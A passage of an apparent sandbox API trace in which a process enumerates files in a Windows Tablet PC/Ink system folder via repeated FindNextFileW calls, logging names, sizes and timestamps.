lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c4bfb78, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x4c4bfb78, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x298e8420, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x56400, dwReserved0=0x0, dwReserved1=0x0, cFileName="InkDiv.dll", cAlternateFileName="")) returned 1 [0208.119] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c412911, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x6c412911, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x29a8c2e0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x201800, dwReserved0=0x0, dwReserved1=0x0, cFileName="InkObj.dll", cAlternateFileName="")) returned 1 [0208.119] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5eab8150, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x5eab8150, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xe4490e80, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x61000, dwReserved0=0x0, dwReserved1=0x0, cFileName="InkWatson.exe", cAlternateFileName="")) returned 1 [0208.119] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7700d105, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x7700d105, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xe45c2150, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x5da00, dwReserved0=0x0, dwReserved1=0x0, cFileName="InputPersonalization.exe", cAlternateFileName="")) returned 1 [0208.119] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91865215, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x91865215, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa20, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipscat.xml", cAlternateFileName="")) returned 1 [0208.119] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27bfdab7, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27bfdab7, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x99e, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipschs.xml", cAlternateFileName="")) returned 1 [0208.119] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c23c14, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c23c14, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x984, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipscht.xml", cAlternateFileName="")) returned 1 [0208.120] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c23c14, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c23c14, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipscsy.xml", cAlternateFileName="")) returned 1 [0208.120] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c49d71, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c49d71, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsdan.xml", cAlternateFileName="")) returned 1 [0208.120] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c49d71, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c49d71, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa38, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsdeu.xml", cAlternateFileName="")) returned 1 [0208.120] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c6fece, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c6fece, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa12, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsen.xml", cAlternateFileName="")) returned 1 [0208.120] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27cbc188, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27cbc188, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbd0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsesp.xml", cAlternateFileName="")) returned 1 [0208.120] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58cd8515, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x58cd8515, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x5ca35e50, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0x0, dwReserved1=0x0, cFileName="IPSEventLogMsg.dll", cAlternateFileName="")) returned 1 [0208.120] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c9602b, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c9602b, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa62, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsfin.xml", cAlternateFileName="")) returned 1 [0208.120] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27cbc188, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27cbc188, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa44, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsfra.xml", cAlternateFileName="")) returned 1 [0208.120] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27ce22e5, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27ce22e5, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa5c, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipshrv.xml", cAlternateFileName="")) returned 1 [0208.121] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27ce22e5, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27ce22e5, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9de, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsita.xml", cAlternateFileName="")) returned 1 [0208.121] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d08442, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d08442, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9188b373, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9da, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsjpn.xml", cAlternateFileName="")) returned 1 [0208.121] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d2e59f, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d2e59f, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa08, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipskor.xml", cAlternateFileName="")) returned 1 [0208.121] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dc49d13, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x5dc49d13, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x2a1fc7a0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xa000, dwReserved0=0x0, dwReserved1=0x0, cFileName="IpsMigrationPlugin.dll", cAlternateFileName="")) returned 1 [0208.121] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d2e59f, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d2e59f, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa42, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsnld.xml", cAlternateFileName="")) returned 1 [0208.130] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d2e59f, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d2e59f, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa14, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsnor.xml", cAlternateFileName="")) returned 1 [0208.131] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d546fc, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d546fc, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa28, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsplk.xml", cAlternateFileName="")) returned 1 [0208.131] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63de1b63, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x63de1b63, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x2a991650, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x17200, dwReserved0=0x0, dwReserved1=0x0, cFileName="IpsPlugin.dll", cAlternateFileName="")) returned 1 [0208.131] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d546fc, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d546fc, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x8c6, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsptb.xml", cAlternateFileName="")) returned 1 [0208.131] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d7a859, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d7a859, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x8c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsptg.xml", cAlternateFileName="")) returned 1 [0208.131] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d7a859, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d7a859, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa54, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsrom.xml", cAlternateFileName="")) returned 1 [0208.131] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27da09b6, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27da09b6, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsrus.xml", cAlternateFileName="")) returned 1 [0208.131] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27da09b6, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27da09b6, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa08, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipssrb.xml", cAlternateFileName="")) returned 1 [0208.131] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27dc6b13, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27dc6b13, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa24, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipssrl.xml", cAlternateFileName="")) returned 1 [0208.131] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27decc70, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27decc70, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipssve.xml", cAlternateFileName="")) returned 1 [0208.132] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0208.132] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0208.132] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b45ecf9, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x8b45ecf9, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x2b0dd120, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x14de00, dwReserved0=0x0, dwReserved1=0x0, cFileName="journal.dll", cAlternateFileName="")) returned 1 [0208.132] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0208.132] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lt-LT", cAlternateFileName="")) returned 1 [0208.132] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lv-LV", cAlternateFileName="")) returned 1 [0208.133] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69e22d6e, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x69e22d6e, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x3188e7b0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x1a0200, dwReserved0=0x0, dwReserved1=0x0, cFileName="micaut.dll", cAlternateFileName="")) returned 1 [0208.133] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x472c5956, ftCreationTime.dwHighDateTime=0x1ca040e, ftLastAccessTime.dwLowDateTime=0xa4945a00, ftLastAccessTime.dwHighDateTime=0x1ca0424, ftLastWriteTime.dwLowDateTime=0x9fcc4285, ftLastWriteTime.dwHighDateTime=0x1ca0425, nFileSizeHigh=0x0, nFileSizeLow=0x7c000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Ink.dll", cAlternateFileName="")) returned 1 [0208.133] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa12394d3, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa12394d3, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa125f634, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x179c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="mip.exe", cAlternateFileName="")) returned 1 [0208.133] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ad46e47, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x5ad46e47, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x344e2230, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x609c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="mraut.dll", cAlternateFileName="")) returned 1 [0208.133] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66c00201, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x66c00201, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x34eb4c90, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xc200, dwReserved0=0x0, dwReserved1=0x0, cFileName="mshwgst.dll", cAlternateFileName="")) returned 1 [0208.133] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x901e133e, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x901e133e, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x353c2bb0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x105a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="mshwLatin.dll", cAlternateFileName="")) returned 1 [0208.133] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0208.133] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0208.134] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0208.134] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, 